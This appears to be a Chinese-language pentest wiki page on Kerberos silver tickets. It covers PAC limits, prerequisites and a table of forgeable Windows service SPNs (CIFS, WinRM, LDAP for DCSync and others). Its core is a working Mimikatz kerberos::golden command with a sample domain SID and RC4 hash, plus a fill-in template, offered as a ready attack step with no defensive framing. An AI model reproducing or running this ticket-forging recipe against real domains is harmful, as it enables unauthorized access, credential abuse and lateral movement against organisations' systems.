白银票据

限制

白银票据会受到PAC扩展的限制，该扩展会进一步验证账户对目标服务是否有权限、有什么权限

条件

获取目标服务的NTLM hash
无PAC限制

利用

制作票据

kerberos::golden /domain:fbi.gov /sid:S-1-5-21-124841762-3349575232-3850797422 /target:server /service:CIFS /rc4:5b225f307b6b7013ab624504ae314f5e /user:test /ptt

kerberos::golden /domain:<域名> /sid:<域 SID> /target:<目标服务器主机名> /service:<服务类型> /rc4:<NTLMHash> /user:<伪造的用户名> /ptt
# 域sid就是域用户的sid去掉最后的RID即可

白银票据可制作的服务一表

Service Type

Service Silver Tickets

WMI

HOST RPCSS

PowerShell Remoting

HOST HTTP

WinRM

HOST HTTP

Scheduled Tasks

HOST

Windows File Share (CIFS)

CIFS

LDAP operations includingMimikatz DCSync

LDAP

Windows Remote Server Administration Tools

RPCSS LDAP CIFS

Previous黄金票据 NextDACL权限维持

Last updated 2 years ago

hashtag白银票据

hashtag限制

hashtag条件

hashtag利用

白银票据

限制

条件

利用